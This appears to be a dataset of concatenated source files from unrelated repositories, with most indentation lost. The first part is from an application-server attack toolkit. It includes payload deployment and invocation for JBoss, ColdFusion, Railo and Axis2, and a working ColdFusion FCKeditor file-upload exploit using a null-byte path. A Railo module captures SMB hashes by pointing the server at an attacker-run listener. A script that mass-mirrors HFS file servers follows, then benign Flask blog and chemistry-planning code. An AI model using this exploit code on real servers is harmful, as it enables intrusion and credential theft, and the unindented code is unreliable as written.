# this might be too short for huge files
sleep(3.0)
except Exception, e:
utility.Msg(e, LOG.DEBUG)
finally:
kill(proc.pid, SIGINT)
if war_file:
war_name = war_file.rsplit('/', 1)[1]
# remove our copied file
system("rm -f %s/%s" % (war_name, state.serve_dir))
def waitServe(servert):
""" Small function used to wait for a _serve thread to receive
a GET request. See _serve for more information.
servert should be a running thread.
"""
timeout = 10
status = False
try:
while servert.is_alive() and timeout > 0:
stdout.flush()
stdout.write("\r\033[32m [%s] Waiting for remote server to "
"download file [%ds]" % (utility.timestamp(), timeout))
sleep(1.0)
timeout -= 1
except:
timeout = 0
    if timeout != 10:
        print ''
    if timeout == 0:
utility.Msg("Remote server failed to retrieve file.", LOG.ERROR)
else:
status = True
return status
def wc_invoke(url, local_url, usr = None, pswd = None):
""" Invoke the webconsole deployer
"""
res = None
try:
res = check_output(["./webc_deploy.sh", url, local_url, str(usr),
str(pswd)],
cwd="./src/lib/jboss/webconsole_deploy")
except Exception, e:
utility.Msg(e, LOG.DEBUG)
res = e
return res
def invkdeploy(version, url, local_url, random_int):
"""
"""
res = None
creds = None
if state.usr_auth != None:
creds = state.usr_auth.split(':')
try:
if creds != None:
res = check_output(["./invkdeploy.sh", version, url,
local_url, str(random_int),creds[0],creds[1]],
cwd="./src/lib/jboss/jmxinvoke_deploy",stderr=STDOUT)
else:
res = check_output(["./invkdeploy.sh", version, url,
local_url, str(random_int)],
cwd="./src/lib/jboss/jmxinvoke_deploy",stderr=STDOUT)
except Exception, e:
utility.Msg(e, LOG.DEBUG)
res = str(e)
return res
def bsh_deploy(arch, url, version, usr = None, pswd = None):
""" Invoke the BSHDeployer
"""
res = None
try:
res = check_output(["./bshdeploy.sh", url, arch, version,
str(usr), str(pswd)],
cwd="./src/lib/jboss/bsh_deploy")
except Exception, e:
utility.Msg(e, LOG.DEBUG)
res = e
return res
def deploy_list(usr_platform = None):
""" Simple function for dumping all deployers for supported
platforms. This lists them in the format INTERFACE (name), where
name is used for matching.
"""
for platform in state.supported_platforms:
# check for a specified platform
if usr_platform != 'All' and usr_platform != platform:
continue
utility.Msg("Deployers for '%s'" % platform, LOG.UPDATE)
load = importlib.import_module('src.platform.%s.deployers' % platform)
# load all deployers
modules = list(pkgutil.iter_modules(load.__path__))
if len(modules) <= 0:
utility.Msg("\tNo deployers found.")
continue
for deployer in modules:
try:
dp = deployer[0].find_module(deployer[1]).load_module(deployer[1])
if 'Any' in dp.versions: dp.versions.remove("Any") # used for FP only
utility.Msg("\t%s (%s [%s])" % (dp.title, deployer[1],
'|'.join(dp.versions)))
except Exception, e:
utility.Msg(e, LOG.DEBUG)
continue
def auxiliary_list(usr_platform = None):
""" Lists all platform auxiliary modules
"""
for platform in state.supported_platforms:
# if they've specified a specific platform, check for it
if usr_platform != 'All' and usr_platform != platform:
continue
utility.Msg("Auxiliary modules for '%s'" % platform, LOG.UPDATE)
load = importlib.import_module('src.platform.%s.auxiliary' % platform)
modules = list(pkgutil.iter_modules(load.__path__))
if len(modules) <= 0:
utility.Msg("\tNo auxiliarys found.")
continue
for auxiliary in modules:
try:
aux = auxiliary[0].find_module(auxiliary[1]).load_module(auxiliary[1]).Auxiliary()
except:
utility.Msg("Could not load auxiliary module '%s'" %
auxiliary[1], LOG.DEBUG)
utility.Msg("\t%s ([%s] --%s)" % (aux.name,
'|'.join(aux.versions), aux.flag))
def parse_war_path(war, include_war = False):
""" Parse off the raw WAR name for setting its context
"""
if '/' in war:
war = war.rsplit('/', 1)[1]
if include_war:
return war
else:
return war.split('.')[0]
def killServe():
""" In the event that our local server does not get
invoked, we need to kill it tenderly
"""
try:
get("http://localhost:%s" % state.external_port, timeout=1.0)
except:
pass
```
#### File: src/module/discovery.py
```python
from log import LOG
from os.path import abspath
from fingerprint import FingerEngine
import utility
import re
import pkgutil
import state
def detectFileType(inFile):
#Check to see if file is of type gnmap
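    # A gnmap file typically opens with "# Nmap ... as: nmap -sV ..." and
    # lists each host on a line containing "Host:", which is what we key on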
firstLine = inFile.readline()
secondLine = inFile.readline()
thirdLine = inFile.readline()
#Be polite and reset the file pointer
inFile.seek(0)
if (firstLine.find('nmap') != -1 and thirdLine.find('Host:') != -1):
#Looks like a gnmap file - this wont be true for other nmap output types
#Check to see if -sV flag was used, if not, warn
if(firstLine.find('-sV') != -1 or firstLine.find('-A') != -1 or firstLine.find('-sSV') != -1):
return 'gnmap'
else:
utility.Msg("Nmap version detection not used! Discovery module may miss some hosts!", LOG.INFO)
return 'gnmap'
else:
return None
'''
Parse a gnmap file into a dictionary. The dictionary key is the ip address or hostname.
Each key item is a list of ports and whether or not that port is https/ssl. For example:
>>> targets
{'127.0.0.1': [[443, True], [8080, False]]}
'''
def parseGnmap(inFile):
targets = {}
for hostLine in inFile:
currentTarget = []
#Pull out the IP address (or hostnames) and HTTP service ports
fields = hostLine.split(' ')
ip = fields[1] #not going to regex match this with ip address b/c could be a hostname
for item in fields:
#Make sure we have an open port with an http type service on it
if item.find('http') != -1 and re.findall('\d+/open',item):
port = None
https = False
'''
nmap has a bunch of ways to list HTTP like services, for example:
8089/open/tcp//ssl|http
8000/closed/tcp//http-alt///
8008/closed/tcp//http///
8080/closed/tcp//http-proxy//
443/open/tcp//ssl|https?///
8089/open/tcp//ssl|http
Since we want to detect them all, let's just match on the word http
and make special cases for things containing https and ssl when we
construct the URLs.
'''
port = item.split('/')[0]
if item.find('https') != -1 or item.find('ssl') != -1:
https = True
#Add the current service item to the currentTarget list for this host
currentTarget.append([port,https])
if(len(currentTarget) > 0):
targets[ip] = currentTarget
return targets
def doFingerprint(host, port, ssl, service):
fpath = [abspath("./src/platform/%s/fingerprints" % service)]
match_fps = []
fingerprints = list(pkgutil.iter_modules(fpath))
for fingerprint in fingerprints:
fp = fingerprint[0].find_module(fingerprint[1]).load_module(fingerprint[1])
fp = fp.FPrint()
#Only try to fingerprint if we have a port match
if fp.check(host, port):
# set fingerprint port to match fingerengine port if defined
match_fps.append(fp)
return match_fps
def runDiscovery(targets,options):
fingerengine = FingerEngine()
fingerengine.options = options
'''Run a fingerprint on each host/port/platform combination'''
for host in targets:
utility.Msg("Beginning discovery scan on host %s" % (host))
for platform in state.supported_platforms:
for port in targets[host]:
for fp in doFingerprint(host,port[0],port[1],platform):
utility.Msg("\t%s (version %s port %s)" % (fp.title,
fp.version, port[0]), LOG.SUCCESS)
def run(options):
"""
This module takes an input file (for now, nmap gnmap output) with host IP addresses
and ports and runs the clusterd fingerprinting engine on all HTTP/S servers
identified. All common app server URLs will be checked for each server in order to
attempt to identify what may be running.
"""
"""Read the input file, for now we only support nmap gnmap - should have been run with
the -sV flag to detect HTTP/S servers on non-standard ports"""
try:
targets={}
inFile = open(options.discovery_file,'r')
if(detectFileType(inFile) == 'gnmap'):
targets = parseGnmap(inFile)
else:
utility.Msg("Discovery input file does not appear to be in nmap gnmap format", LOG.ERROR)
return
inFile.close()
runDiscovery(targets,options)
except KeyboardInterrupt:
pass
except OSError:
utility.Msg("Error loading gnmap file for discovery", LOG.ERROR)
```
#### File: src/module/invoke_payload.py
```python
from src.module.deploy_utils import parse_war_path
from time import sleep
from commands import getoutput
from log import LOG
import utility
import state
def invoke(fingerengine, fingerprint, deployer):
"""
"""
if fingerengine.service in ["jboss", "tomcat", "weblogic", "glassfish"]:
if fingerengine.service == 'glassfish' or\
(fingerengine.service == 'jboss' and\
fingerprint.version in ['7.0', '7.1', '8.0', '8.1']):
# different port; if this has changed from default, we may need
# to iterate through fingerprints to find the correct one...
fingerprint.port = 8080
return invoke_war(fingerengine, fingerprint)
elif fingerengine.service in ["coldfusion"]:
return invoke_cf(fingerengine, fingerprint, deployer)
elif fingerengine.service in ['railo']:
return invoke_rl(fingerengine, fingerprint, deployer)
elif fingerengine.service in ['axis2']:
return invoke_axis2(fingerengine, fingerprint, deployer)
else:
utility.Msg("Platform %s does not support --invoke" %
fingerengine.options.remote_service, LOG.ERROR)
def invoke_war(fingerengine, fingerprint):
""" Invoke a deployed WAR or JSP file on the remote server.
This uses unzip because Python's zip module isn't very portable or
fault tolerant; i.e. it fails to parse msfpayload-generated WARs, though
this is a fault of metasploit, not the Python module.
"""
dfile = fingerengine.options.deploy
jsp = ''
if '.war' in dfile:
jsp = getoutput("unzip -l %s | grep jsp" % dfile).split(' ')[-1]
elif '.jsp' in dfile:
jsp = parse_war_path(dfile, True)
if jsp == '':
utility.Msg("Failed to find a JSP in the deployed WAR", LOG.DEBUG)
return
utility.Msg("Using JSP {0} from {1} to invoke".format(jsp, dfile), LOG.DEBUG)
war_path = parse_war_path(dfile)
try:
# for jboss ejb/jmx invokers, we append a random integer
# in case multiple deploys of the same name are used
if fingerengine.random_int:
war_path += fingerengine.random_int
except:
pass
url = "http://{0}:{1}/{2}/{3}".format(
fingerengine.options.ip,
fingerprint.port,
war_path,
jsp)
if _invoke(url):
utility.Msg("{0} invoked at {1}".format(war_path, fingerengine.options.ip))
else:
utility.Msg("Failed to invoke {0}".format(parse_war_path(dfile, True)),
LOG.ERROR)
def invoke_cf(fingerengine, fingerprint, deployer):
"""
"""
dfile = parse_war_path(fingerengine.options.deploy, True)
if fingerprint.version in ["10.0"]:
# deployments to 10 require us to trigger a 404
url = "http://{0}:{1}/CFIDE/ad123.cfm".format(fingerengine.options.ip,
fingerprint.port)
elif fingerprint.version in ["8.0"] and "fck_editor" in deployer.__name__:
# invoke a shell via FCKeditor deployer
url = "http://{0}:{1}/userfiles/file/{2}".format(fingerengine.options.ip,
fingerprint.port,
dfile)
elif 'lfi_stager' in deployer.__name__:
url = 'http://{0}:{1}/{2}'.format(fingerengine.options.ip,
fingerprint.port,
dfile)
else:
url = "http://{0}:{1}/CFIDE/{2}".format(fingerengine.options.ip,
fingerprint.port,
dfile)
if _invoke(url):
utility.Msg("{0} invoked at {1}".format(dfile, fingerengine.options.ip))
else:
utility.Msg("Failed to invoke {0}".format(dfile), LOG.ERROR)
def invoke_rl(fingerengine, fingerprint, deployer):
"""
"""
dfile = parse_war_path(fingerengine.options.deploy, True)
url = 'http://{0}:{1}/{2}'.format(fingerengine.options.ip, fingerprint.port,
dfile)
if _invoke(url):
utility.Msg("{0} invoked at {1}".format(dfile, fingerengine.options.ip))
else:
utility.Msg("Failed to invoke {0}".format(dfile), LOG.ERROR)
def invoke_axis2(fingerengine, fingerprint, deployer):
""" Invoke an Axis2 payload
"""
dfile = parse_war_path(fingerengine.options.deploy)
url = 'http://{0}:{1}/axis2/services/{2}'.format(
fingerengine.options.ip, fingerprint.port,
dfile)
if fingerprint.version not in ['1.6']:
# versions < 1.6 require an explicit invocation of run
url += '/run'
utility.Msg("Attempting to invoke...")
if _invoke(url):
utility.Msg("{0} invoked at {1}".format(dfile, fingerengine.options.ip))
return
utility.Msg("Failed to invoke {0}".format(dfile), LOG.ERROR)
def _invoke(url):
""" Make the request
"""
status = False
cnt = 0
try:
# Some servers take a second or two to deploy the application; probe for state.timeout * 2
while cnt < state.timeout:
response = utility.requests_get(url)
if response.status_code in [200, 202]:
status = True
break
cnt += 1
sleep(2)
except Exception, e:
utility.Msg("Failed to invoke payload: %s" % e, LOG.ERROR)
status = False
return status
```
#### File: axis2/fingerprints/AX12.py
```python
from src.platform.axis2.interfaces import DefaultServer
class FPrint(DefaultServer):
def __init__(self):
super(FPrint, self).__init__()
self.version = '1.2'
```
#### File: coldfusion/deployers/fck_editor.py
```python
from src.platform.coldfusion.interfaces import CINTERFACES
from src.module.deploy_utils import parse_war_path
from os.path import abspath
from log import LOG
import utility
title = CINTERFACES.CFM
versions = ['8.0']
def deploy(fingerengine, fingerprint):
""" Exploits the exposed FCKeditor in CF 8.x
"""
cfm_path = abspath(fingerengine.options.deploy)
cfm_name = parse_war_path(cfm_path, True)
dip = fingerengine.options.ip
utility.Msg("Checking if FCKEditor is exposed...")
url = "http://{0}:{1}".format(dip, fingerprint.port)
uri = "/CFIDE/scripts/ajax/FCKeditor/editor/dialog/fck_about.html"
response = utility.requests_get(url + uri)
    if response.status_code == 200 and "FCKeditor" in response.content:
utility.Msg("FCKeditor exposed, attempting to write payload...")
else:
utility.Msg("FCKeditor doesn't seem to be exposed (HTTP %d)" % response.status_code)
return
try:
payload = {"NewFile" : ("asdf.txt", open(cfm_path, "r").read())}
except Exception, e:
utility.Msg("Error reading file: %s" % e, LOG.ERROR)
return
uri = "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm"
uri += "?Command=FileUploads&Type=File&CurrentFolder=/{0}%00".format(cfm_name)
response = utility.requests_post(url + uri, files=payload)
if response.status_code == 200 and "OnUploadCompleted" in response.content:
utility.Msg("Deployed. Access /userfiles/file/{0} for payload"\
.format(cfm_name), LOG.SUCCESS)
else:
utility.Msg("Could not write payload (HTTP %d)" % (response.status_code))
```
#### File: jboss/fingerprints/JBoss71Manage.py
```python
from src.platform.jboss.interfaces import JINTERFACES
from cprint import FingerPrint
class FPrint(FingerPrint):
def __init__(self):
self.platform = "jboss"
self.version = "7.1"
self.title = JINTERFACES.MM
self.uri = "/console/app/gwt/chrome/chrome_rtl.css"
self.port = 9990
self.hash = "14755bd918908c2703c57bd1a52046b6"
```
#### File: railo/auxiliary/smb_hashes.py
```python
from src.platform.railo.authenticate import checkAuth
from src.platform.railo.interfaces import RINTERFACES
from src.lib.cifstrap import Handler
from auxiliary import Auxiliary
from threading import Thread
from time import sleep
from os import getuid
from log import LOG
import socket
import utility
import state
class Auxiliary:
def __init__(self):
self.name = 'Obtain SMB hash'
self.versions = ['3.3', '4.0']
self.flag = 'rl-smb'
self._Listen = False
def check(self, fingerprint):
if fingerprint.version in self.versions and fingerprint.title \
in [RINTERFACES.WEB]:
return True
return False
def run(self, fingerengine, fingerprint):
""" Create a search collection via a nonexistent
datasource
"""
if getuid() > 0:
utility.Msg("Root privs required for this module.", LOG.ERROR)
return
utility.Msg("Setting up SMB listener...")
self._Listen = True
thread = Thread(target=self.smb_listener)
thread.start()
utility.Msg("Invoking UNC deployer...")
base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
uri = "/railo-context/admin/web.cfm?action=services.search"
data = { "collName" : "asdf",
"collPath" : "\\\\{0}\\asdf".format(utility.local_address()),
"collLanguage" : "english",
"run" : "create"
}
url = base + uri
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title)
if not cookies:
utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip,
fingerprint.port),
LOG.ERROR)
self._Listen = False
return
response = utility.requests_post(url, data=data, cookies=cookies)
while thread.is_alive():
# spin...
sleep(1)
if response.status_code != 200:
utility.Msg("Unexpected response: HTTP %d" % response.status_code)
self._Listen = False
def smb_listener(self):
""" Accept a connection and pass it off for parsing to cifstrap
"""
try:
handler = None
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.settimeout(state.timeout)
sock.bind(('', 445))
sock.listen(1)
while self._Listen:
try:
(con, addr) = sock.accept()
except:
# timeout
return
handler = Handler(con, addr)
handler.start()
while handler.is_alive():
# spin...
sleep(1)
if handler.data:
utility.Msg("%s" % handler.data, LOG.SUCCESS)
break
except Exception, e:
utility.Msg("Socket error: %s" % e, LOG.ERROR)
finally:
sock.close()
```
#### File: tomcat/fingerprints/Tomcat33.py
```python
from src.platform.tomcat.interfaces import AppInterface
class FPrint(AppInterface):
def __init__(self):
super(FPrint, self).__init__()
self.version = "3.3"
self.uri = "/doc/readme"
```
#### File: weblogic/fingerprints/WL12s.py
```python
from src.platform.weblogic.interfaces import WINTERFACES, WLConsole
class FPrint(WLConsole):
def __init__(self):
super(FPrint, self).__init__()
self.version = "12"
self.title = WINTERFACES.WLS
self.port = 9002
self.ssl = True
``` |
{
"source": "0x27/hfsdump",
"score": 3
} |
#### File: 0x27/hfsdump/hfsdump.py
```python
from clint.textui import progress
import requests
import argparse
import urlparse
import sys
def do_list(listfile):
print "{+} Using list: %s" %(listfile)
# mirrors a list of servers
try:
f = open(listfile, "r")
except Exception, e:
sys.exit("{!} Abort: Could not read listfile")
urls = f.readlines()
for url in urls:
mirror_url(url.strip())
def mirror_url(url):
# mirrors a server
print "{+} Mirroring %s" %(url)
mirror_url = url + "/?mode=archive&recursive"
host = urlparse.urlparse(url).netloc
if ":" in host:
host = host.replace(":", "_")
outfile = "output/mirror-%s.tar" %(host) # mirror- prefix and s/:/_/g because fuck gnu-tar
print "{*} Saving to %s" %(outfile)
try:
r = requests.get(url=mirror_url, stream=True)
with open(outfile, 'wb') as f:
total_length = int(r.headers.get('content-length'))
for chunk in progress.bar(r.iter_content(chunk_size=1024), expected_size=(total_length/1024) + 1):
if chunk:
f.write(chunk)
f.flush()
except Exception, e:
print "{!} Mirroring failed."
return False
print "{*} Done!"
return True
def main():
parser = argparse.ArgumentParser()
parser.add_argument("target", help="url or list of urls (if list, use -l flag)")
parser.add_argument("-l", action="store_true", help="Use listfile")
args = parser.parse_args()
if args.l:
do_list(args.target)
else:
mirror_url(args.target)
if __name__ == "__main__":
main()
``` |
{
"source": "0x29a/buggy",
"score": 3
} |
#### File: buggy/comment/models.py
```python
import datetime as dt
from buggy.database import (Column, Model, SurrogatePK, db, reference_col,
relationship)
class Comment(SurrogatePK, Model):
"""Comments model."""
__tablename__ = 'comments'
name = Column(db.String(80), nullable=True)
email = Column(db.String(80), unique=True, nullable=True)
text = Column(db.Text(500), nullable=False)
post_id = reference_col('posts', nullable=False)
post = relationship('Post', backref='comments')
created_at = Column(db.DateTime, default=dt.datetime.utcnow)
def __repr__(self):
"""Represent instance as a unique string."""
return '<Comment({title})>'.format(title=self.id)
@property
def cute_date(self):
"""Date cutifier."""
return self.created_at.strftime('%B %d, %Y at %I:%M %p')
```
#### File: buggy/buggy/database.py
```python
from .compat import basestring
from .extensions import db
# Alias common SQLAlchemy names
Column = db.Column
relationship = db.relationship
class CRUDMixin(object):
"""
Mixin that adds convenience methods for
CRUD (create, read, update, delete) operations.
"""
@classmethod
def create(cls, **kwargs):
"""
Sugar
"""
instance = cls(**kwargs)
return instance.save()
def update(self, commit=True, **kwargs):
"""More sugar"""
for attr, value in kwargs.items():
setattr(self, attr, value)
return commit and self.save() or self
def save(self, commit=True):
"""SUGAR"""
db.session.add(self)
if commit:
db.session.commit()
return self
def delete(self, commit=True):
"""...sugar"""
db.session.delete(self)
return commit and db.session.commit()
class Model(CRUDMixin, db.Model):
"""
Base model class that includes CRUD convenience methods.
"""
__abstract__ = True # Tells alchemy not to create table in database
class SurrogatePK(object):
"""
A mixin that adds surrogate primary key field 'id' to any
declarative-mapped class.
"""
__table_args__ = {'extend_existing': True}
id = db.Column(db.Integer, primary_key=True)
@classmethod
def get_by_id(cls, record_id):
"""
Gets object by it's id.
"""
if any(
(isinstance(record_id, basestring) and record_id.isdigit(),
isinstance(record_id, (int, float)))
):
return cls.query.get(int(record_id))
return None
def reference_col(tablename, nullable=False, pk_name='id', **kwargs):
"""
Stores references.
"""
return db.Column(
db.ForeignKey('{0}.{1}'.format(tablename, pk_name)),
nullable=nullable, **kwargs
)
```
#### File: buggy/post/utils.py
```python
from .models import Tag
def tags_by_data(data):
"""
    Queries the DB for existing tags and returns all tags that must be attached to the post.
"""
input_tags = set(map(str.strip, data.split(',')))
input_tags.discard('')
existing_tags = Tag.query.filter(Tag.name.in_(input_tags))
new_tags = input_tags - set(map(str, existing_tags))
# Return just created and already existed tags.
return [Tag(name=tag) for tag in new_tags] + list(existing_tags)
```
#### File: buggy/user/models.py
```python
import datetime as dt
from flask_login import UserMixin
from buggy.database import (Column, Model, SurrogatePK, db, reference_col,
relationship)
from buggy.extensions import bcrypt
class Role(SurrogatePK, Model):
"""Role model."""
__tablename__ = 'roles'
name = Column(db.String(80), unique=True, nullable=False)
user_id = reference_col('users', nullable=True)
user = relationship('User', backref='roles')
def __init__(self, name, **kwargs):
"""Forces to create instance with specific arguments."""
db.Model.__init__(self, name=name, **kwargs)
def __repr__(self):
"""Represent instance as a unique string."""
return '<Role({name})>'.format(name=self.name)
class User(UserMixin, SurrogatePK, Model):
"""User model."""
__tablename__ = 'users'
username = Column(db.String(80), unique=True, nullable=False)
email = Column(db.String(80), unique=True, nullable=True)
#: The hashed password
password = Column(db.Binary(128), nullable=False)
created_at = Column(
db.DateTime, nullable=False, default=dt.datetime.utcnow
)
first_name = Column(db.String(30), nullable=True)
last_name = Column(db.String(30), nullable=True)
is_active = Column(db.Boolean(), default=False)
is_admin = Column(db.Boolean(), default=False)
def __init__(self, username, password, **kwargs):
"""Forces to create instance with specific arguments."""
db.Model.__init__(self, username=username, password=password, **kwargs)
self.set_password(password)
def set_password(self, password):
"""
Generate bcrypt hash of password string.
"""
self.password = bcrypt.generate_password_hash(password)
def check_password(self, value):
"""
Verify that hash of value == hash of password.
"""
return bcrypt.check_password_hash(self.password, value)
@property
def full_name(self):
"""Full name."""
return '{0} {1}'.format(self.first_name, self.last_name)
def __repr__(self):
"""Represent instance as a unique string."""
return '<User({username!r})>'.format(username=self.username)
``` |
{
"source": "0x2b3bfa0/aizynthfinder",
"score": 3
} |
#### File: interfaces/gui/clustering.py
```python
import matplotlib.pylab as plt
import numpy as np
from ipywidgets import Output, Label, BoundedIntText, Button, HBox, Tab
from IPython.display import display
from scipy.cluster.hierarchy import dendrogram
from aizynthfinder.utils.route_clustering import ClusteringHelper
class ClusteringGui:
"""
    GUI extension to cluster routes
:param routes: the routes to cluster
:type routes: RouteCollection
:param content: what to cluster on
:type content: TreeContent, optional
"""
def __init__(self, routes, content="both"):
self._routes = routes
self._routes.distance_matrix(content=content, recreate=True)
self._input = dict()
self._output = dict()
self._buttons = dict()
        self._create_dendrogram()
self._create_input()
self._create_output()
@classmethod
    def from_app(cls, app, content="both"):
"""
Helper function to create a GUI from a GUI app interface
:param app: the app to extract the routes from
:type app: AiZynthApp
:param content: what to cluster on
:type content: TreeContent, optional
:return: the GUI object
:rtype: ClusteringGUI
"""
        return cls(app.finder.routes, content)
    def _create_dendrogram(self):
dend_out = Output(
layout={"width": "99%", "height": "310px", "overflow_y": "auto"}
)
with dend_out:
print("This is the hierarchy of the routes")
fig = plt.Figure()
dendrogram(
ClusteringHelper(self._routes.distance_matrix()).linkage_matrix(),
color_threshold=0.0,
labels=np.arange(1, len(self._routes) + 1),
ax=fig.gca(),
)
fig.gca().set_xlabel("Route")
fig.gca().set_ylabel("Distance")
display(fig)
display(dend_out)
def _create_input(self):
self._input["number_clusters"] = BoundedIntText(
continuous_update=True,
min=1,
max=len(self._routes) - 1,
layout={"width": "80px"},
)
self._buttons["cluster"] = Button(description="Cluster")
self._buttons["cluster"].on_click(self._on_cluster_button_clicked)
box = HBox(
[
Label("Number of clusters to make"),
self._input["number_clusters"],
self._buttons["cluster"],
]
)
display(box)
help_out = Output()
with help_out:
print(
"Optimization is carried out if the number of given clusters are less than 2"
)
display(help_out)
def _create_output(self):
self._output["clusters"] = Tab()
display(self._output["clusters"])
def _on_cluster_button_clicked(self, _):
self._buttons["cluster"].enabled = False
self._routes.cluster(self._input["number_clusters"].value)
self._buttons["cluster"].enabled = True
outputs = []
for i, cluster in enumerate(self._routes.clusters):
output = Output(
layout={
"border": "1px solid silver",
"width": "99%",
"height": "500px",
"overflow_y": "auto",
}
)
with output:
for image in cluster.images:
print(f"Route {self._routes.images.index(image)+1}")
display(image)
outputs.append(output)
self._output["clusters"].set_title(i, f"Cluster {i+1}")
self._output["clusters"].children = outputs
```
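A hedged notebook usage sketch for the GUI above; `app` stands for an existing `AiZynthApp` with routes already computed:

```python
# In a Jupyter notebook cell, after a finished route search:
gui = ClusteringGui.from_app(app, content="both")
# or, given a RouteCollection directly:
# gui = ClusteringGui(app.finder.routes, content="molecules")
```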
#### File: aizynthfinder/utils/analysis_helpers.py
```python
import abc
from collections import defaultdict
import networkx as nx
from aizynthfinder.chem import (
Molecule,
UniqueMolecule,
FixedRetroReaction,
hash_reactions,
)
from aizynthfinder.utils.image import make_visjs_page
class _ReactionTreeLoader(abc.ABC):
""" Base class for classes that creates a reaction tree object
"""
def __init__(self, *args, **kwargs):
# To avoid circular imports
from aizynthfinder.analysis import ReactionTree # noqa
self.tree = ReactionTree()
self._load(*args, **kwargs)
self.tree.is_solved = all(
self.tree.in_stock(node) for node in self.tree.leafs()
)
_RepeatingPatternIdentifier.find(self.tree)
def _add_node(self, node, depth=0, transform=0, in_stock=False, hide=False):
attributes = {
"hide": hide,
"depth": depth,
}
if isinstance(node, Molecule):
attributes.update({"transform": transform, "in_stock": in_stock})
self.tree.graph.add_node(node, **attributes)
if not self.tree.root:
self.tree.root = node
@abc.abstractmethod
def _load(self, *args, **kwargs):
pass
class ReactionTreeFromDict(_ReactionTreeLoader):
"""
Creates a reaction tree object from a dictionary
:param tree_dict: the dictionary representation
:type tree_dict: dict
"""
def _load(self, tree_dict):
self._parse_tree_dict(tree_dict)
def _parse_tree_dict(self, tree_dict, ncalls=0):
product_node = UniqueMolecule(smiles=tree_dict["smiles"])
self._add_node(
product_node,
depth=2 * ncalls,
transform=ncalls,
hide=tree_dict.get("hide", False),
in_stock=tree_dict["in_stock"],
)
rxn_tree_dict = tree_dict.get("children", [])
if not rxn_tree_dict:
return product_node
rxn_tree_dict = rxn_tree_dict[0]
reaction_node = FixedRetroReaction(
product_node,
smiles=rxn_tree_dict["smiles"],
metadata=rxn_tree_dict.get("metadata", {}),
)
self._add_node(
reaction_node, depth=2 * ncalls + 1, hide=rxn_tree_dict.get("hide", False)
)
self.tree.graph.add_edge(product_node, reaction_node)
reactant_nodes = []
for reactant_tree in rxn_tree_dict.get("children", []):
reactant_node = self._parse_tree_dict(reactant_tree, ncalls + 1)
self.tree.graph.add_edge(reaction_node, reactant_node)
reactant_nodes.append(reactant_node)
reaction_node.reactants = reactant_nodes
return product_node
class ReactionTreeFromMcts(_ReactionTreeLoader):
"""
Creates a reaction tree object from MCTS nodes and reaction objects
:param actions: the reactions forming the route
:type actions: list of RetroReaction
:param nodes: the MCTS nodes forming the route
:type nodes: list of Node
"""
def _load(self, actions, nodes):
self._unique_mols = {}
root_mol = nodes[0].state.mols[0]
self._unique_mols[id(root_mol)] = root_mol.make_unique()
self._add_node(
self._unique_mols[id(root_mol)], in_stock=nodes[0].state.is_solved,
)
for child, action in zip(nodes[1:], actions):
self._add_bipartite(child, action)
def _add_bipartite(self, child, action):
reaction_obj = FixedRetroReaction(
self._unique_mol(action.mol), smiles=action.smiles, metadata=action.metadata
)
self._add_node(reaction_obj, depth=action.mol.transform + 1)
self.tree.graph.add_edge(self._unique_mol(action.mol), reaction_obj)
reactant_nodes = []
for mol in child.state.mols:
if mol.parent is action.mol:
self._add_node(
self._unique_mol(mol),
depth=2 * mol.transform,
transform=mol.transform,
in_stock=mol in child.state.stock,
)
self.tree.graph.add_edge(reaction_obj, self._unique_mol(mol))
reactant_nodes.append(self._unique_mol(mol))
reaction_obj.reactants = reactant_nodes
def _unique_mol(self, molecule):
id_ = id(molecule)
if id_ not in self._unique_mols:
self._unique_mols[id_] = molecule.make_unique()
return self._unique_mols[id_]
class _RepeatingPatternIdentifier:
"""
Encapsulation of algorithm to identify repeating patterns of reactions and mark them as hidden.
A unit of the repetition is the hash of two consecutive reactions,
where the first unit should be the first two reactions of the route.
This is for hiding repeating patterns of e.g. protection followed by deprotection,
which is a common behaviour for the tree search when it fails to solve a route.
"""
@staticmethod
def find(reaction_tree):
"""
Find the repeating patterns and mark the nodes
:param reaction_tree: the reaction tree to process
:type reaction_tree: ReactionTree
"""
for node in reaction_tree.reactions():
            # We are only interested in starting at the very first reaction
if any(reaction_tree.graph[mol] for mol in node.reactants[0]):
continue
actions = _RepeatingPatternIdentifier._list_reactions(reaction_tree, node)
if len(actions) < 5:
continue
hashes = [
hash_reactions([rxn1, rxn2], sort=False)
for rxn1, rxn2 in zip(actions[:-1:2], actions[1::2])
]
for idx, (hash1, hash2) in enumerate(zip(hashes[:-1], hashes[1:])):
if hash1 == hash2:
_RepeatingPatternIdentifier._hide_reaction(
reaction_tree, actions[idx * 2]
)
_RepeatingPatternIdentifier._hide_reaction(
reaction_tree, actions[idx * 2 + 1]
)
reaction_tree.has_repeating_patterns = True
# The else-clause prevents removing repeating patterns in the middle of a route
else:
break
@staticmethod
def _hide_reaction(reaction_tree, reaction_node):
reaction_tree.graph.nodes[reaction_node]["hide"] = True
        for reactant in reaction_node.reactants[0]:
            reaction_tree.graph.nodes[reactant]["hide"] = True
@staticmethod
def _list_reactions(reaction_tree, reaction_node):
""" List all reaction nodes from the given one to the last
"""
reactions = [reaction_node]
curr_rxn = reaction_node
product = reaction_node.mol
while product is not reaction_tree.root:
curr_rxn = next(reaction_tree.graph.predecessors(product))
product = curr_rxn.mol
reactions.append(curr_rxn)
return reactions
class CombinedReactionTrees:
"""
Encapsulation of an algorithm that combines several reaction trees into a
larger bipartite graph with all reactions and molecules.
The reactions at a specific level of the reaction trees are grouped based
on the reaction smiles.
    :param reaction_trees: the list of reaction trees to combine
:type reaction_trees: list of ReactionTree
"""
def __init__(self, reaction_trees):
self.graph = nx.DiGraph()
first_rt = reaction_trees[0]
# This is to avoid circular imports
self._reaction_tree_class = first_rt.__class__
self.root = first_rt.root
self.graph.add_node(self.root, in_stock=first_rt.in_stock(self.root))
rt_node_spec = [(rt.root, rt.graph) for rt in reaction_trees]
self._add_reaction_trees_to_node(self.root, rt_node_spec)
def to_dict(self):
"""
Returns the graph as a dictionary in a pre-defined format.
:return: the combined reaction trees
:rtype: dict
"""
rt = self._reaction_tree_class()
rt.root = self.root
rt.graph = self.graph
return rt.to_dict()
def to_visjs_page(
self, filename, in_stock_colors={True: "green", False: "orange"},
):
"""
Create a visualization of the combined reaction tree using the vis.js network library.
The HTML page and all the images will be put into a tar-ball.
